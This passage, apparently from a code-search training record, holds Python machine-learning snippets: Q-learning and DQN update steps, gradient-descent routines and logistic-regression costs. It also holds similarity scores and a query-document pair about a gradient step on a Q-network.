Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))\n\n # Get expected Q values from local model\n Q_expected = self.qnetwork_local(states).gather(1, actions)\n\n # Compute loss MSE\n loss = (Q_expected - Q_targets.detach()).pow(2)\n # Add weights to loss\n loss = loss * weights\n # Add noise to loss to arrive at prior weights\n prios = loss + 1e-6\n # Take mean\n loss = loss.mean()\n\n # Minimize the loss\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n # Update buffer priorities\n self.memory.update_priorities(zip(idxs, prios.data.cpu().numpy()))\n\n\n\n # ------------------- update target network ------------------- #\n self.soft_update(self.qnetwork_local, self.qnetwork_target, TAU)", "def prediction_cost(a, y):\n return np.sum(-(y * np.log(a) + (1 - y) * np.log(1 - a)))", "def get_value(self, state):\n epsilon = self.epsilon\n possible_actions = self.get_legal_actions(state)\n\n #If there are no legal actions, return 0.0\n if len(possible_actions) == 0:\n return 0.0\n\n optimal_action = possible_actions[\n np.argmax([self.get_qvalue(state, action) for action in possible_actions])\n ]\n state_value = 0\n for action in possible_actions:\n if action == optimal_action:\n state_value += (1 - epsilon) * self.get_qvalue(state, action)\n state_value += (epsilon / len(possible_actions)) * self.get_qvalue(state, action)\n return state_value", "def update_parameter(self):\n\n if self.testing: # 1. No random choice when testing\n self.epsilon = 0\n else: # 2. Update parameters when learning\n if self.epsilon > 0.:\n self.epsilon -= 0.01\n\n return self.epsilon", "def learn(self):\r\n last_experience = self.memory[-1]\r\n Q_target = np.zeros(self.action_size)\r\n Q_target[last_experience[1]] = last_experience[2]\r\n self.model.fit(last_experience[0], Q_target[None,:], epochs=5, verbose=0)\r\n minibatch = random.sample(self.memory, self.minibatch_size)\r\n for obs, action, reward, next_obs, done in minibatch:\r\n Q_target = np.zeros(self.action_size)\r\n if done:\r\n Q_target[action] = reward\r\n if not done:\r\n Q_target[action] = reward + self.gamma*np.amax(self.model.predict(next_obs)[0])\r\n self.model.fit(obs, Q_target[None,:], epochs=1, verbose=0)\r\n if (self.epsilon > self.epsilon_min):\r\n self.epsilon *= self.epsilon_decay", "def compute_cost(self,X, y):\r\n num_examples = np.shape(X)[0]\r\n z = np.dot(X,self.theta) + self.bias\r\n exp_z = np.exp(z)\r\n softmax_scores = exp_z / np.sum(exp_z, axis=1, keepdims=True)\r\n \r\n one_hot_y = np.zeros((num_examples,np.max(y)+1))\r\n logloss = np.zeros((num_examples,)) \r\n for i in range(np.shape(X)[0]):\r\n one_hot_y[i,y[i]] = 1\r\n logloss[i] = -np.sum(np.log(softmax_scores[i,:]) * one_hot_y[i,:])\r\n data_loss = np.sum(logloss)\r\n return 1./num_examples * data_loss", "def prediction_b(self):\r\n return self._prediction_b", "def get_targets(self, states, j):\n a = self.get_optimal_action(states, j)\n a = np.expand_dims(a, axis=1)*1\n return {'gt_action': a}", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n # print \"getQValue\"\n features = self.featExtractor.getFeatures(state, self.index)#.values()\n #weights = self.weights.values()\n #dotProduct = reduce( (lambda x, y: x*y), map( (lambda x, y: x+y), self.weights, features))\n #return dotProduct\n score = 0\n for key in features.keys():\n score += features[key]*self.weights[key]\n return score", "def weighted_mv(K_train, K_val, alphas, y_train, y_val, K_test, gamma= 1/2 ):\n errors = []\n y_tr_pred = np.zeros(y_train.shape[0])\n y_val_pred = np.zeros(y_val.shape[0])\n y_te_pred = np.zeros(1000)\n \n for i in range(len(K_train)):\n \n y_tr_i= K_train[i] @ alphas[i]\n y_val_i= K_val[i] @ alphas[i]\n \n err = error(y_train, y_tr_i)\n if err == 0:\n err = 10\n else:\n err = gamma * np.log((1-err)/err)\n \n errors += [err]\n \n y_tr_pred += err * y_tr_i\n y_val_pred += err * y_val_i\n y_te_pred += err * (K_test[i] @ alphas[i])\n \n print(\"Assigned Weights : \", errors)\n print(f\"Training score : {1 - error(y_train, y_tr_pred)}\")\n print(f\"Validation score : {1 - error(y_val, y_val_pred)}\")\n return(y_te_pred)", "def _optimize_model(self):\n # Check that there is enough plays in self.experiences\n if len(self.memory) < self.batch_size:\n return 0\n\n # Select self.batch_size random experience\n transitions = random.sample(self.memory, self.batch_size)\n batch = Transition(*zip(*transitions))\n\n state_batch = torch.cat(batch.state)\n action_batch = torch.cat(batch.action)\n next_state_batch = torch.cat(batch.next_state)\n reward_batch = torch.cat(batch.reward)\n done_batch = torch.cat(batch.done)\n\n # Compute Q(s, a) for all state\n q_values = self.policy_net(state_batch).gather(1, action_batch)\n\n # Compute Q(s_{t+1}) for all next_state\n next_q_values = torch.zeros(self.batch_size, device=device)\n with torch.no_grad():\n next_q_values[~done_batch] = self.target_net(\n next_state_batch[~done_batch]).max(1)[0].detach()\n\n # Compute expected Q-value\n expected_q_values = (next_q_values * self.gamma) + reward_batch\n\n # Compute loss\n loss = F.mse_loss(q_values, expected_q_values.unsqueeze(1))\n\n # Optimize the model\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n return loss.item()" ]
[ "0.6133086", "0.59240603", "0.59210104", "0.58679605", "0.586299", "0.5832981", "0.58184266", "0.58139116", "0.58036226", "0.5798045", "0.5787385", "0.5786582", "0.5784244", "0.57797366", "0.5778133", "0.57767266", "0.57760173", "0.5755751", "0.57456607", "0.5729801", "0.57243717", "0.5693466", "0.56906044", "0.5680105", "0.567885", "0.56759185", "0.56671196", "0.5666579", "0.56520826", "0.5650481", "0.56414515", "0.56392795", "0.56283087", "0.5624142", "0.56177735", "0.56054276", "0.56020284", "0.55910796", "0.55827254", "0.5563582", "0.55581164", "0.555128", "0.55471987", "0.55407315", "0.5540507", "0.5525057", "0.55233073", "0.5522592", "0.5517754", "0.55123144", "0.55094266", "0.5504891", "0.54895663", "0.54824233", "0.5481208", "0.5477058", "0.54769725", "0.5476637", "0.54761875", "0.5463349", "0.5462289", "0.5455556", "0.54541355", "0.5441168", "0.5435217", "0.54340124", "0.543063", "0.5429943", "0.54273576", "0.542374", "0.5423282", "0.54193395", "0.54155946", "0.54086155", "0.5406157", "0.540339", "0.53989863", "0.5397723", "0.5396894", "0.5391779", "0.53902686", "0.5387504", "0.53870076", "0.538623", "0.5386046", "0.5386046", "0.53840536", "0.5379638", "0.53781515", "0.53780913", "0.5378034", "0.5371724", "0.53630066", "0.53619385", "0.535553", "0.53542304", "0.5351978", "0.5351417", "0.53506124", "0.5349746" ]
0.59281206
1
Perform one step of gradient descent on (yj Q(phi, aj, w))^2
def one_step_gd(self, batch): # get target values yj targets = self.get_target(batch) phi_input = np.vstack(batch[0]) masks = self.get_masks(batch[1]) dummy_targets = targets.max(axis=1) X = [phi_input, targets, masks] Y = [dummy_targets, targets] # update main network with one step of gradient descent # self.Qmodel.fit(X, Y, batch_size=len(X)) # pdb.set_trace() metrics = self.train_model.train_on_batch(X, Y) # every fixed number of steps, update target network self.c_count += 1 # print(self.c_count, self.c) if self.c_count == self.c: # if self.verbose: # print('* Target network updated') # update target network to be equal the main network self.update_target_network() # reset counter self.c_count = 0 return metrics[0]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def learning_by_gradient_descent(y, tx, w, gamma):\n loss = calculate_loss(y,tx,w)\n grad = calculate_gradient(y,tx,w)\n w_new = w - gamma*grad\n #grad is for debugging purpose\n return loss, w_new,grad", "def learning_by_gradient_descent(y, tx, w, gamma):\n loss = calculate_loss(y,tx,w)\n grad = calculate_gradient(y,tx,w)\n w = w-gamma*grad\n return w, loss", "def learning_by_gradient_descent(y, tx, w, gamma):\n\tgrad = calculate_gradient(y, tx, w)\n\n\tw = w - gamma * grad\n\treturn w", "def grad_j(self,w,j):\n g = 0\n for i in range(len(self.x)):\n # Each example contributes -sigma(-y_i * x_i.w) * y_j x_ij\n g -= sigmoid(-self.y[i] * np.dot(w, self.x[i,:])) * self.y[i] * self.x[i,j]\n #regularisation\n g += self.alpha * w[j]\n return g", "def gradient_ascent(self, w, X, y, lr):\r\n # INSERT YOUR CODE HERE\r\n #raise Exception('Function not yet implemented!')\r\n # gradient = x_j*(y-σ(wTX))\r\n return np.dot(X.T, y-self.sigmoid(np.dot(X, w)))", "def gradient_step(self):\n n = 3 #Granularity of line search\n grad = self.gradient()\n #grad = grad/np.linalg.norm(grad, 2)\n W = project(self.W[-1] + grad)\n A = np.linspace(0., 1., n+2)[1:-1]\n Objective = map(self, [(1. - a)*self.W[-1] + a*W for a in A])\n a = A[np.argmax(Objective)]\n W = (1. - a)*self.W[-1] + a*W\n obj = np.max(Objective)\n self.objective.append(obj)\n self.W.append(W)\n self.iterations += 1", "def gradient_descent(y, tx, initial_w, max_iters, gamma, compute_loss, compute_grad, verbose=False):\n \n w = initial_w.copy()\n loss = 0\n\n for n_iter in range(max_iters):\n grad = compute_grad(y, tx, w)\n loss = compute_loss(y, tx, w)\n\n w -= gamma * grad\n\n if verbose:\n print(f\"Gradient Descent ({n_iter}/{max_iters - 1}): loss={loss}, w={w}\")\n \n return w, loss", "def gradient_descent(x, y, w, max_iter, alpha = 0.001):\n \n N = y.shape[0]\n \n J_hist = np.zeros(max_iter)\n\n print(\"\\nGradient descent starts\\n\")\n\n for i in range(0, max_iter):\n \n J = np.sum( (y_hat(x, w) - y) ** 2 ) / (2 * N)\n\n J_hist[i] = J\n \n print(\"Iteration %d, J(w): %f\\n\" % (i, J))\n \n gradient = np.dot(x.T, y_hat(x, w) - y) / N \n \n w = w - alpha * gradient\n\n print(\"Gradient descent finished.\\n\")\n \n return (J_hist, w)", "def calculate_gradient(y, tx, w): \n return tx.T@(sigmoid(tx@w)-y)", "def gradientDescent(self,X, y, theta): \n # number of instances\n m = len(y)\n J_history = np.zeros((self.NUM_ITERS,1))\n for i in range(self.NUM_ITERS):\n h = self.sigmoid(X@theta)\n grad = 1 / m * X.T @ (h - y)\n theta = theta - self.ALPHA * grad \n J_history[i] = self.costFunction(theta, X, y)\n \n \n return theta, J_history", "def grad(self,w):\n # Calculate the vector -sigma(-y_i * x_i.w)\n s = -np.array([sigmoid(-yi * np.dot(xi,w)) for xi,yi in zip(self.x,self.y)])\n # Multiply it by xy\n g = np.array([np.dot(xyj,s) for xyj in self.xy.transpose()])\n # Add regularisation\n g += self.alpha*w\n return g\n #g = np.array([self.grad_j(w,j) for j in xrange(len(w))])", "def gradient_descent(x, y, theta=[[0], [0]]):\n m = y.size\n j_history = []\n for i in range(ITERATIONS):\n h = x.dot(theta)\n theta = theta - (ALPHA / m) * (x.T.dot(h - y))\n j_history.append(compute_cost(x, y, theta))\n return theta, j_history", "def gradient_step(self):\n n = 10 #Granularity of line search\n grad = self.gradient()\n W = project(self.W[-1] + grad)\n A = np.linspace(0., self.alpha, n+2)[1:-1]\n Objective = map(self, [(1. - a)*self.W[-1] + a*W for a in A])\n a = A[np.argmax(Objective)]\n W = (1. - a)*self.W[-1] + a*W\n obj = np.max(Objective)\n self.objective.append(obj)\n self.W.append(W)\n self.iterations += 1", "def gradientDescent(X, y, theta, alpha, num_iters):\n\n # Initialize some useful values\n J_history = []\n m = y.size # number of training examples\n\n for i in range(num_iters):\n # ====================== YOUR CODE HERE ======================\n # Instructions: Perform a single gradient step on the parameter vector\n # theta.\n #\n # Hint: While debugging, it can be useful to print out the values\n # of the cost function (computeCost) and gradient here.\n #\n # Calculate the gradient step according to the equation for theta1:\n g_step1 = (alpha / m * np.sum( (np.dot(X,theta) - y) * X[:,1]) )\n # Gradient step for theta knot:\n g_step0 = (alpha / m * np.sum( (np.dot(X,theta) - y) ) )\n \n #update theta\n theta[0] = (theta[0] - g_step0)\n theta[1] = (theta[1] - g_step1)\n \n #print([theta , g_step1, g_step0])\n\n # ============================================================\n\n # Save the cost J in every iteration\n J_history.append(computeCost(X, y, theta))\n\n return theta, J_history", "def calculate_gradient(y, tx, w):\n\n\tret = tx.T.dot(sigmoid(np.dot(tx, w)) - y)\n\treturn ret", "def gradient(theta, X, y, learning_rate):\n m = len(y)\n\n theta = theta.reshape((-1,1))\n grad = np.zeros(theta.shape)\n h = sigmoid(np.dot(X, theta)) \n \n grad = np.dot((h-y).T, X)/m\n grad = grad.T\n grad[1:] += (learning_rate/m)*theta[1:]\n return grad", "def calculate_gradient(y, tx, w):\n return tx.T.dot(sigmoid(tx.dot(w))-np.reshape(y,(len(y),1)))", "def gradientFunction(theta, X, y):\n y = y[:, 0]\n m = y.shape # number of training samples\n grad = X.T.dot(sigmoid(theta.dot(X.T))-1*y)\n grad /= m\n return grad", "def run_gradient_descent_iteration(X, Y, theta, alpha, lambda_factor, temp_parameter):\n delta = sparse.coo_matrix(theta.shape).toarray()\n\n h = compute_probabilities(X, theta, temp_parameter)\n\n for j in range(delta.shape[0]):\n y = Y\n y = np.where(y != j, 0, 1)\n p = y - h[j]\n\n x = X.T * p\n x = x.T\n x = x.sum(axis=0)\n\n grad = -x / (temp_parameter * X.shape[0]) + lambda_factor * theta[j]\n\n delta[j] += grad\n\n theta -= alpha * delta\n\n return theta", "def run_gradient_descent(data,theta,alpha,num_iters):\n population = data[:,0]\n prices = data[:,1]\n x = ones(shape=(len(population),2)) #add ones for theta0 \n x[:,1] = population\n x = transpose(x)\n error_history = zeros(shape=(num_iters,1))\n \n for i in range(num_iters):\n predictions = theta.dot(x)\n errors_x1 = (predictions - prices) * x[0,:]\n errors_x2 = (predictions - prices) * x[1,:]\n theta[0][0] = theta[0][0] - alpha*(1.0/len(population))*errors_x1.sum()\n theta[0][1] = theta[0][1] - alpha*(1.0/len(population))*errors_x2.sum()\n error_history[i,0] = calculate_cost(theta,data)\n \n return theta, error_history", "def gradient_descent(data_x, data_y, parameters, learn_rate, nb_iterations):\n\n # Cost history\n cost_tracking = np.zeros(nb_iterations)\n\n for _i in range(nb_iterations):\n parameters -= learn_rate * gradient(data_x, data_y, parameters)\n # recording the cost for each iteration\n cost_tracking[_i] = cost_function(data_x, data_y, parameters)\n\n return parameters, cost_tracking", "def gradient_descent(x0,df,rate=0.1,max_iters=1000,min_step=1e-6,max_step=1e5,\n projection=None,trajectory=False,step_history=False,f=None,\n cost_history=False,feedback=False,plot_history=False):\n if feedback is True:\n print(\"gd.gradient_descent():\")\n if f is not None:\n assert callable(f)\n fx0 = f(x0)\n if feedback is True:\n print(f\" initial cost = {fx0:.2e}\")\n if projection is not None:\n assert callable(projection)\n project = True\n else:\n project = False\n if trajectory is True:\n xx = [x0.copy()]\n if step_history is True:\n steps = []\n if cost_history is True:\n assert callable(f)\n fx = [fx0]\n\n x = x0.copy()\n for i in range(max_iters):\n dx = -rate*df(x)\n if project is True:\n x0 = x.copy()\n x = projection(x0+dx)\n dx = x-x0\n else:\n x += dx\n if trajectory is True:\n xx.append(x.copy())\n if cost_history is True:\n fx += [f(x)]\n step_size = np.linalg.norm(dx)\n if step_history is True:\n steps += [step_size]\n if step_size < min_step or step_size > max_step:\n break\n\n results = dict()\n results['output'] = x\n if trajectory is True:\n results['trajectory'] = xx\n if cost_history is True:\n results['cost_history'] = fx\n if step_history is True:\n results['step_history'] = steps\n if plot_history is True:\n assert step_history is True or cost_history is True\n plt.figure()\n if step_history is True:\n plt.semilogy(steps,label='step size')\n if cost_history is True:\n plt.semilogy(fx,label='cost')\n plt.xlabel('iteration number')\n plt.title('Gradient Descent')\n plt.legend()\n results['figure'] = plt\n plt.show(block=False)\n \n if feedback is True:\n if f is not None:\n print(f\" final cost = {f(x):.2e}\")\n \n return results", "def gradient_descent(features, values, theta, alpha, num_iterations):\r\n\r\n m = len(values)\r\n cost_history = []\r\n\r\n for i in range (num_iterations):\r\n \r\n h = numpy.dot(features, theta)\r\n \r\n theta = theta - alpha / m * numpy.dot((h-values),features)\r\n \r\n cost = compute_cost(features, values, theta)\r\n \r\n cost_history.append(cost)\r\n\r\n return theta, pandas.Series(cost_history) # leave this line for the grader\r", "def gradientdescent(cost_func, theta, args=(), delta_func = 0):\n step = 1\n old_cost = 0\n while True:\n theta_old = theta.copy()\n cost = cost_func(theta, *args)\n delta = delta_func(theta, *args)\n theta = theta - step * delta\n if cost > old_cost and old_cost != 0:\n step = step*0.7\n if np.allclose(theta_old, theta):\n break\n old_cost = cost\n return theta", "def logit_cost_grad(self, theta, X, y):\n\n grad = np.zeros(len(theta))\n\n ### YOUR CODE HERE\n sig = utils.sigmoid(theta)\n # sig = np.subtract(sig, y)\n sig = sig - y\n grad = np.dot(X.T, sig) + 2 * self.params['lamb'] * self.regularizer[1](self.weights)\n ### END YOUR CODE\n\n return grad", "def step_maxL_gradient_descent(y, tx, w, gamma):\n loss=loss_maxL(y, tx, w)\n grad=calculate_maxL_gradient(y,tx,w)\n # update w by gradient\n w=w-gamma*grad\n return w, loss", "def run_steep_gradient_descent(data_x, data_y, len_data, alpha, theta):\n n = len_data\n # WE NEED TO transpose data_x into (p+1) *n ,theta is 1*(p+1)\n prod = np.dot(theta, data_x.transpose())\n\n prod -= data_y\n print(\"pro: data_x\", prod.shape, data_x.shape)\n #prod represent the loss of the hypothesis and true label\n sum_grad = np.dot(prod, data_x)\n print(\"总梯度的值:\",sum_grad.shape)\n\n # batch-gradient descent\n theta = theta -(alpha / n) * sum_grad\n return theta", "def grad_l2(w, X, y, **kwargs):\n return -1 * np.dot(X.T, y - np.dot(X, w)) / X.shape[0]", "def gradient_descent(self, X ,eta, tol,iter):\n gd=[]\n gd_x=[X]\n iteration=0\n # current_pt=X\n first_derivative=sym.diff(self.gdfunc)\n #print(first_derivative)\n x=sym.Symbol('x')\n first_derivative=sym.lambdify(x,first_derivative)\n learn_rate=eta\n \n \n prev_x=X\n new_x=prev_x -(learn_rate*first_derivative(prev_x))\n gd_x.append(new_x)\n #print(\"prev_x = \",prev_x,\" Next x = \",new_x)\n for i in range(iter):\n prev_x=new_x\n #print(prev_x)\n new_x=prev_x -(learn_rate*first_derivative(prev_x))\n gd_x.append(new_x)\n # print(\"x = \",new_x,\"Gradient =\",learn_rate*self.func(prev_x))\n if abs(self.func(new_x)) <= self.func(tol) :\n break\n iteration=iteration+1\n #print(\"Best at GD x= \",new_x)\n gd.append(gd_x)\n gd.append(new_x)\n gd.append(iteration)\n\n return gd", "def gradient_descent(x_data, starting_b, starting_w, learning_rate, num_iterations):\n\n b = starting_b\n w = starting_w\n\n for i in range(num_iterations):\n b, w = step_gradient(b, w, x_data, learning_rate)\n b_history.append(b) # stores bias approximations to plot\n w_history.append(w) # stores weight approximations to plot\n err = error(b, w, x_data)\n if err <= .6: # if the error is acceptable exit iterations loop\n print('error = % f' % err)\n break\n return [b, w]", "def gradient_descent(self, alpha, batch, weight_gradients, bias_gradients):\n self._dwg = [0] * 8\n self._dbg = [0] * 8\n self._cost = 0\n\n workers = []\n for i in range(batch[0].shape[0]-1):\n p = Process(target=self.mp_gd, args=(batch, weight_gradients, bias_gradients, i))\n workers.append(p)\n p.start()\n\n\n for p in workers:\n self._cost += self._q.get()\n\n self._dwg = list(map(add, self._dwg, self._dwgq.get()))\n self._dbg = list(map(add, self._dbg, self._dbgq.get()))\n\n p.join()\n\n for j in range(len(self._dwg)):\n weight_gradients[j] = weight_gradients[j] - alpha * self._dwg[j]\n bias_gradients[j] = bias_gradients[j] - alpha * self._dbg[j]\n cost = self._cost/len(batch)\n self._cost_history.append(cost)\n\n return weight_gradients, bias_gradients", "def costFunction(self,theta, X, y): \n m = len(y)\n h = self.sigmoid(X@theta)\n J = 1 / m * (- y.T @ self.log(h) - (1-y).T @ self.log(1-h)) \n # grad = 1/ m * X.T @ (h - y)\n return J", "def exp_grad(self, xs, *args, **kwargs):\n raise NotImplementedError", "def objective_grad(self, wb, X, y):\n N, D = X.shape\n w = wb[:-1]\n b = wb[-1]\n loss_grad = np.zeros(D+1) \n # grad wrt regularization\n loss_grad[-1] = 2 * self.reg_param * (b - self.b0) # grad_b\n loss_grad[:-1] = 2 * self.reg_param * (w - self.w0) # grad_w\n\n for i in range(N):\n tmpvar = np.exp(-1 * y[i] * (np.dot(w, X[i]) + b)) \n loss_grad[-1] += tmpvar/(1 + tmpvar) * -1 * y[i] # grad_b \n loss_grad[:-1] += tmpvar/(1 + tmpvar) * -1 * y[i] * X[i] # grad_w\n\n return loss_grad", "def gradient(theta, x, y):\n m = len(y)\n n = len(theta)\n z = theta.dot(x.T)\n grad = np.zeros(n)\n for i in xrange(m):\n grad += (g(z[i]) - y[i]) * x[i]\n return 1. / m * grad", "def gradient(w, x, t):\n return 2 * np.dot(x.T, (nn(x, w) - t))", "def learning_by_penalized_gradient_descent(y, tx, w, gamma, lambda_):\n loss = calculate_loss(y, tx, w) + lambda_ * np.squeeze(w.T.dot(w))\n grad = calculate_gradient(y, tx, w) + 2 * lambda_ * w\n w = w-gamma*grad\n return w, loss", "def train_gradient_descent(self, X, y, learning_rate=0.01, n_iters=100):\r\n # Step 0: Initialize the parameters\r\n n_samples, n_features = X.shape\r\n self.weights = np.zeros(shape=(n_features,1))\r\n self.bias = 0\r\n costs = []\r\n\r\n for i in range(n_iters):\r\n # Step 1: Compute a linear combination of the input features and weights\r\n y_predict = np.dot(X, self.weights) + self.bias\r\n\r\n # Step 2: Compute cost over training set\r\n cost = (1 / n_samples) * np.sum((y_predict - y)**2)\r\n costs.append(cost)\r\n\r\n if i % 100 == 0:\r\n print(f\"Cost at iteration {i}: {cost}\")\r\n\r\n # Step 3: Compute the gradients\r\n dJ_dw = (2 / n_samples) * np.dot(X.T, (y_predict - y))\r\n dJ_db = (2 / n_samples) * np.sum((y_predict - y)) \r\n \r\n # Step 4: Update the parameters\r\n self.weights = self.weights - learning_rate * dJ_dw\r\n self.bias = self.bias - learning_rate * dJ_db\r\n\r\n return self.weights, self.bias, costs", "def sgd_step(df, alpha, prev_beta, xy_i):\n x_i, y_i = xy_i\n gradient = df(x_i, y_i, prev_beta)\n return [beta_j + alpha * df_j\n for beta_j, df_j in zip(prev_beta, gradient)]", "def log_likelihood_gradient(y, tx, w):\n return tx.T.dot(sigmoid(tx.dot(w))-y)", "def learning_by_penalized_gradient(y, tx, w, gamma, lambda_):\n\n #on test avec Newton\n\n loss,gradient,_ = penalized_logistic_regression(y,tx,w,lambda_)\n\n w = w - gamma*gradient\n return loss, w,gradient", "def costFunction(theta,X,y):\n m = X.shape[0]\n J = 0\n h = sigmoid (np.dot(X,theta))\n \n J = (1/m)* ((-np.dot(y.T,(np.log(h)))) - np.dot((1 - y).T,(np.log(1-h))))\n \n #grad = (1/m) * np.dot(X.T,(h-y))\n grad = (1/m) * np.dot((h.T - y), X).T\n \n return J, grad", "def gradient_descent(X, Y, epsilon=1e-6, l=1, step_size=1e-4, max_steps=1000):\n beta = np.zeros(X.shape[1])\n for s in range(max_steps):\n # TODO: Implement iterations.\n pass\n return beta", "def gradient_descent(initial_theta, X, y, niter, alpha, Lambda=0.0):\n theta_list = []\n cost_list = []\n\n theta = initial_theta\n for i in range(0, niter):\n theta -= alpha*gradient(theta, X, y, Lambda)\n theta_list.append(theta)\n cost_list.append(cost(theta, X, y, Lambda))\n\n return theta_list, cost_list", "def compute_gradient(y, tx, w):\n\tN = y.shape[0]\n\te = y - np.dot(tx, w)\n\n\tgradLw = -1/N * np.dot(tx.T, e)\n\treturn gradLw", "def gradient_descent(features, values, theta, alpha, num_iterations):\r\n \r\n m = len(values)\r\n cost_history = []\r\n\r\n for i in range(num_iterations):\r\n # your code here\r\n cost = compute_cost(features, values, theta)/(2.0*m)\r\n cost_history.append([cost])\r\n \r\n error = features.dot(theta) - values\r\n error = np.reshape(error,(error.shape[0], 1))\r\n errorWeighted = features*error\r\n errorSum = (np.sum(errorWeighted,0))/(m*1.0)\r\n theta = theta - alpha*errorSum \r\n \r\n return theta, pandas.Series(cost_history)", "def gradient_descent_step(self, x, y, learning_rate):\n # compute derivative of loss wrt Z\n dZ = self.derivative_loss(y, self.predict(x))\n dW = np.dot(dZ, x)\n # subtract average derivative from weights\n self.w -= learning_rate * 1.0/dW.shape[0] * dW\n if self.fit_b:\n self.b -= learning_rate * (1.0/x.shape[0] * np.sum(dZ))", "def _gradient_descent(self, X, y, epochs, learning_rate, batch_size):\n num_feats = X.shape[1]\n num_samples = X.shape[0]\n\n y = y.reshape(num_samples, 1)\n W = np.random.rand(num_feats, 1)\n training_loss_epochs = []\n\n for ix in range(epochs):\n shuffled_ix = (np.arange(0, len(X)))\n np.random.shuffle(shuffled_ix)\n X = X[shuffled_ix, :]\n y = y[shuffled_ix, :]\n\n for batch_ix in np.arange(0, X.shape[0], batch_size):\n dW = self._compute_gradient(W, X[batch_ix:batch_ix + batch_size], y[batch_ix:batch_ix + batch_size])\n W -= learning_rate * dW\n\n if ix % 10 == 0:\n y_pred = np.dot(X, W)\n training_loss = self.mse(y, y_pred)\n print('epoch {0} : training loss {1}'.format(ix, training_loss))\n training_loss_epochs.append(training_loss[0])\n\n self.weights = W\n self.training_loss = training_loss_epochs\n return None", "def gradient_descent(self, x, y):\n # Initialize weights vector\n self.weights = np.zeros(len(x[0]))\n\n # Storing number of training example in a variable \n n = len(x)\n\n # Initiate variables to keep track of the current and smallest loss recorded\n lowest_loss = sys.float_info.max\n current_loss = sys.float_info.max\n\n # Initiate variables to keep track of step sizes\n norm = sys.float_info.max\n smallest_norm = sys.float_info.max\n\n # Initiate list variable that stores all previous weights\n prev_weights = []\n\n # Initiate list that stores all the errors. \n errors = []\n \n # Variable to keep track of the number of iterations that returns a bigger loss than current loss\n k_loss_iteration = 1\n\n # Learning loop\n for i in range(self.max_iter):\n\n # Append current weights\n prev_weights.append(np.array(self.weights))\n \n # Minimizing Loss Function Error by adjusting weights using Gradient Descent\n self.weights += self.learning_rate * (sum([x[i] * (y[i] - self.logistic_function(self.weights.dot(x[i]))) for i in range(n)]) - 2 * self.l2 * self.weights)\n\n # Compute the error of the Cost Function and store it in a list\n current_loss = self.cost(x,y)\n\n if len(errors) > 1 and current_loss > errors[-1]:\n k_loss_iteration += 1\n else: \n k_loss_iteration = 1\n\n errors.append(current_loss)\n \n # Track smallest loss\n if current_loss < lowest_loss:\n lowest_loss = current_loss\n\n # Compute the L2 Norm of the difference between current weights and previous weights\n norm = np.linalg.norm(self.weights - prev_weights[-1])\n\n # Track smallest step size and set it as error threshold\n if norm < smallest_norm:\n smallest_norm = norm\n\n # If this L2 norm is smaller than the error_threshold it means that it converged, hence we can break. In other words, repeat until the step size is too small\n if self.error_threshold != None and norm < self.error_threshold:\n print(\"Converged after {} iterations!\".format(i))\n break\n\n # stop if error hasn't gone down in k iterations\n if k_loss_iteration >= 10:\n print(k_loss_iteration + \" iterations of loss not decreasing on {}th itertion.\".format(i))\n break\n\n # Log final weights\n print(\"Final norm: \" + str(norm) + \"\\nSmallest step size recorded: \" + str(smallest_norm) + \"\\nFinal error: \" + str(current_loss) + \"\\nLowest error recorded: \" + str(lowest_loss) + \"\\nNumber of epochs: \" + str(len(errors)) + \"\\nFinal weights: \" + str(self.weights))", "def gradient_descent(self, X, theta, Y, m):\n\n Z = X.dot(theta)\n H = Predict.g(Z)\n gradient = np.dot(X.T, (H - Y)) / m\n return self.alpha * gradient", "def _compute_func_grad(self, w):\n W = w.reshape((self.X.shape[1], self.Y.shape[1]))\n self.nll_, self.grad_ = calculate_gradient(self.X, self.Y, W, self.prior, self.weighted,0)", "def gradient_descent(f, df, x, sigma=0.5, epsilon=1e-8):\n pass", "def least_squares_GD(y, tx, initial_w, max_iters, gamma, verbose=False):\n return gradient_descent(y, tx, initial_w, max_iters, gamma, compute_mse, \n compute_mse_gradient, verbose=verbose)", "def compute_gradient(theta, X, y):\n m = X.shape[0]\n grad_theta = np.dot(X.transpose(), (np.dot(X, theta) - y)) / m\n #print theta, grad_theta, objective_function(theta, X, y)\n return grad_theta", "def _grad_j(q_j, A_j, b_j, b_j_norm, a_1_j, a_2_j, m):\n return (A_j.t() @ q_j / (-m)) + (b_j * (a_1_j / b_j_norm + a_2_j))", "def gradient_descend(self, X, y, state_generators, operator_programs=None,\r\n qvm=None):\r\n history_theta, history_loss, history_grad = [], [], []\r\n coeff, theta = 1.0, self.initial_theta\r\n \r\n prog_input_gen = state_generators['input']\r\n prog_output_gen = state_generators['output']\r\n prog_output_grad = state_generators['grad']\r\n \r\n n_samples = len(X)\r\n n_theta = len(theta)\r\n \r\n if qvm is None:\r\n self.qvm = api.QVMConnection()\r\n else:\r\n self.qvm = qvm\r\n \r\n # Check operators\r\n if not isinstance(operator_programs, list):\r\n operator_programs = [operator_programs]\r\n n_operators = len(operator_programs)\r\n \r\n # Check batch size\r\n if self.batch_size is None:\r\n self.batch_size = n_samples\r\n self.batch_size = min(self.batch_size, n_samples)\r\n \r\n # Loop over epochs\r\n for e in range(self.epochs): \r\n \r\n # Loop over batches\r\n batches = self.generate_batches(X, y, self.batch_size)\r\n n_batches = len(batches)\r\n for i, batch in enumerate(batches):\r\n \r\n batch_X, batch_y = batch\r\n n_samples_in_batch = len(batch_X)\r\n \r\n # Predictions\r\n batch_y_pred = np.zeros((n_samples_in_batch, n_operators))\r\n for k in range(n_samples_in_batch):\r\n prog = prog_input_gen(batch_X[k,:])\r\n prog += prog_output_gen(theta)\r\n batch_y_pred[k,:] = coeff * np.array(qvm.expectation(prog, operator_programs))\r\n if self.loss == self.loss_entropy:\r\n batch_y_pred[k,:] = np.exp(batch_y_pred[k,:]) / np.sum(np.exp(batch_y_pred[k,:]))\r\n \r\n # Comput loss\r\n loss_value = self._compute_loss(batch_y, batch_y_pred)\r\n \r\n # Display status\r\n if self.verbose:\r\n print('Epoch: {}/{} ::: Batch: {}/{} ::: Loss: {:.5f}'.format(e+1, self.epochs, i+1, n_batches, loss_value)) \r\n \r\n # Gradient\r\n if not (e == self.epochs - 1 and i == n_batches - 1):\r\n grad = np.zeros((n_samples_in_batch, n_operators, n_theta))\r\n for k in range(n_samples_in_batch):\r\n \r\n # Define input state 